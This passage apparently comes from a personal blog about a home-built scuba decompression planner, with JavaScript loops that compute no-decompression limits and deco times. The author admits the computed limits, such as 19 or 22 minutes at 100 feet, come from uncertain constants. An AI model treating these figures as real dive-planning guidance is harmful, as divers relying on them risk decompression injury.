    plan.addFlat(dive.feetToMeters(100), "Air", bottomTime);
    plan.addDepthChange(dive.feetToMeters(100), 0, "Air", 3);

    if (plan.getCeiling(1.0) > 0) {
        console.log("NDL for 100 feet is: " + (bottomTime-1));
        break;
    }
}
NDL for 100 feet is: 19

That’s interesting. For the same parameters, if we assume a three-minute ascent, our NDL went up – we can stay down longer if we are ASSURED of a roughly 30-feet-per-minute ascent at the end.

Now remember these numbers are entirely made up. My constants are probably helter-skelter. You shouldn’t use the SPECIFIC numbers on this model. But there’s something intuitive we discovered.

Let’s try it again with a 3 minute safety stop at 15 feet:

for (var bottomTime = 1; bottomTime <= 120; bottomTime++) {
    var buhlmann = dive.deco.buhlmann();
    var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
    plan.addBottomGas("Air", 0.21, 0.0);
    plan.addFlat(dive.feetToMeters(100), "Air", bottomTime);
    plan.addFlat(dive.feetToMeters(15), "Air", 3);

    if (plan.getCeiling(1.0) > 0) {
        console.log("NDL for 100 feet is: " + (bottomTime-1));
        break;
    }
}
NDL for 100 feet is: 22

Once again these numbers make sense – if we are ASSURED of a 3 minute stop at 15 feet, our NDL goes up. How interesting.

This gives you a better idea of a “dynamic” dive. You aren’t exactly teleporting from depth to depth, and those ascents and descents matter. Try this for different gases.
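
For example, here’s the same NDL-with-ascent loop run once per gas (a rough sketch; the fO2 values are the usual recreational mixes, and the outputs deserve the same skepticism as everything else in this post):

var gases = [
    { name: "Air",   fO2: 0.21 },
    { name: "EAN32", fO2: 0.32 },
    { name: "EAN36", fO2: 0.36 }
];

for (var g = 0; g < gases.length; g++) {
    for (var bottomTime = 1; bottomTime <= 120; bottomTime++) {
        var buhlmann = dive.deco.buhlmann();
        var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
        plan.addBottomGas(gases[g].name, gases[g].fO2, 0.0);
        plan.addFlat(dive.feetToMeters(100), gases[g].name, bottomTime);
        plan.addDepthChange(dive.feetToMeters(100), 0, gases[g].name, 3);

        if (plan.getCeiling(1.0) > 0) {
            console.log("NDL for 100 feet on " + gases[g].name + " is: " + (bottomTime - 1));
            break;
        }
    }
}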

Dive Planner Recipes

This is really for my personal reference. If it helps you, I’m glad.

A couple of weeks ago, I wrote this tool (http://deco-planner.archisgore.com). You can go read the history, motivation, etc. on that page and the GitHub repo ad nauseam.

NOTE: Why is this important/useful? Don’t computers tell you how much deco you should do? Yes, they do exactly that, and do it pretty well. Here’s what a computer won’t tell you – how much deco would you be looking at _if_ you extended the dive by 10 minutes? Let’s say that by extending it 10 minutes, or pushing it 10 feet deeper, your obligation jumps from 30 minutes to 50 minutes. That is objectively two-thirds more gas than you planned for. This tool/post is about understanding those shapes, so that even with a computer telling you what your deco is, you can decide whether you’re going to like doing it or not.

This post is about how to use that tool effectively, with some pre-canned recipes that generate information more cheaply and easily than any other tool I know of or can think of.

The first recipe (and the primary reason I built the entire damn thing) is to get an idea of how ratio-deco changes over different bottom times. Does it grow linearly? Non-linearly? Say you’re at 150 feet for “x” minutes longer than your plan, and you just don’t happen to have a computer to do your math. Do you have a vague idea of how the increments shape up?

Let’s find the answer to that very question quickly.

Deco time change as a function of bottom time:

//This function is a utility to get total dive time out of all segments
var calculateDiveTime = function(diveplan) {
    var totalTime = 0;
    for (var index = 0; index < diveplan.length; index++) {
        var segment = diveplan[index];
        totalTime = totalTime + segment.time;
    }
    return totalTime;
}

//In this loop we'll run a 150 foot dive for bottom times between 1 and 120
// minutes, calculate total dive time, find deco time (by subtracting
// bottom time), and print it.
for (var time = 1; time <= 120; time++) {
    var buhlmann = dive.deco.buhlmann();
    var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
    plan.addBottomGas("2135", 0.21, 0.35);
    plan.addDecoGas("50%", 0.50, 0);
    plan.addDecoGas("Oxygen 100%", 1.0, 0.0);
    plan.addFlat(dive.feetToMeters(150), "2135", time);
    var decoPlan = plan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    var totalTime = calculateDiveTime(decoPlan);
    var decoTime = totalTime - time;
    console.log(decoTime);
}
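
Strictly speaking, that loop prints one number per line. To get the paste-able decoTimes array I refer to below, a tiny variation collects the values first (run it right after the snippet above so calculateDiveTime is already defined; the array name is just my own):

//Same 150-foot dive sweep as above, but pushing each deco time into an array
var decoTimes = [];
for (var time = 1; time <= 120; time++) {
    var buhlmann = dive.deco.buhlmann();
    var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
    plan.addBottomGas("2135", 0.21, 0.35);
    plan.addDecoGas("50%", 0.50, 0);
    plan.addDecoGas("Oxygen 100%", 1.0, 0.0);
    plan.addFlat(dive.feetToMeters(150), "2135", time);
    var decoPlan = plan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    decoTimes.push(calculateDiveTime(decoPlan) - time);
}

//One comma-separated line, ready to paste into a spreadsheet or plot.ly
console.log(decoTimes.join(", "));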

What’s really cool is, I can now chart that decoTimes array using Excel or Numbers or whatever your spreadsheet is. I just paste it in plot.ly, and get this:

Deco time change as a function of depth:

Now let’s look at how decompression changes if my depth comes out different than anticipated. We can generate deco schedules for that too:

//This function is a utility to get total dive time out of all segments
var calculateDiveTime = function(diveplan) {
    var totalTime = 0;
    for (var index = 0; index < diveplan.length; index++) {
        var segment = diveplan[index];
        totalTime = totalTime + segment.time;
    }
    return totalTime;
}

//In this loop we'll run a 30-minute dive for each depth between 120 and 180
// feet, calculate total dive time, find deco time (by subtracting
// bottom time), and print it.
for (var depth = 120; depth <= 180; depth++) {
    var buhlmann = dive.deco.buhlmann();
    var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
    plan.addBottomGas("2135", 0.21, 0.35);
    plan.addDecoGas("50%", 0.50, 0);
    plan.addDecoGas("Oxygen 100%", 1.0, 0.0);
    plan.addFlat(dive.feetToMeters(depth), "2135", 30);
    var decoPlan = plan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    var totalTime = calculateDiveTime(decoPlan);
    var decoTime = totalTime - 30;
    console.log(decoTime);
}

And we get this:

Finally, let’s plot how VPM-B compares to Buhlmann. In this case, we have to add a depth change from 0 feet to 150 feet, because VPM is very sensitive to the slopes, unlike Buhlmann, which only worries about tissue loading (more on this later, I promise).

Here’s the code to generate Buhlmann vs VPM deco times for the same dive profile:

//This function is a utility to get total dive time out of all segments
var calculateDiveTime = function(diveplan) {
    var totalTime = 0;
    for (var index = 0; index < diveplan.length; index++) {
        var segment = diveplan[index];
        totalTime = totalTime + segment.time;
    }
    return totalTime;
}

//In this loop we'll run a 150 foot dive for bottom times between 1 and 120
// minutes, compute the deco time under both Buhlmann and VPM-B (by
// subtracting bottom time and the 5-minute descent), and print both.
for (var time = 1; time <= 120; time++) {
    var buhlmann = dive.deco.buhlmann();
    var bplan = new buhlmann.plan(buhlmann.ZH16BTissues);
    bplan.addBottomGas("2135", 0.21, 0.35);
    bplan.addDecoGas("50%", 0.50, 0);
    bplan.addDecoGas("Oxygen 100%", 1.0, 0.0);
    bplan.addDepthChange(0, dive.feetToMeters(150), "2135", 5);
    bplan.addFlat(dive.feetToMeters(150), "2135", time);
    var bdecoPlan = bplan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    var btotalTime = calculateDiveTime(bdecoPlan);
    var bdecoTime = btotalTime - time - 5;

    var vpm = dive.deco.vpm();
    var vplan = new vpm.plan();
    vplan.addBottomGas("2135", 0.21, 0.35);
    vplan.addDecoGas("50%", 0.50, 0);
    vplan.addDecoGas("Oxygen 100%", 1.0, 0.0);
    vplan.addDepthChange(0, dive.feetToMeters(150), "2135", 5);
    vplan.addFlat(dive.feetToMeters(150), "2135", time);
    var vdecoPlan = vplan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    var vtotalTime = calculateDiveTime(vdecoPlan);
    var vdecoTime = vtotalTime - time - 5;

    console.log(bdecoTime + " " + vdecoTime);
}

And the chart that comes out:

Scuba Diving tools

At some point I made a page to document random scuba tools I build/will-build/want-to-build/want-others-to-build.

The last part is a bit tricky. I want many things – and asking others to build something is painful. You don’t always get what you want. You don’t always like what you get. And you rarely get what you want, the way you like it, at a price you’re willing to pay for it.

So, on a terribly-themed page (because I absolutely suck at designing web pages), here’s a link to some tools I’m working on:

https://archisgore.com/scuba-diving-resources/

The next couple of big things coming up are a better UI (especially a plotter/charter) for the dive planner, and a Raspberry Pi Zero-based dive computer (on which you can write deco plans on a full Linux distro).

Don’t hold your breath though. My history with these things is haphazard, depending on how obsessively I feel the need/want at any given time.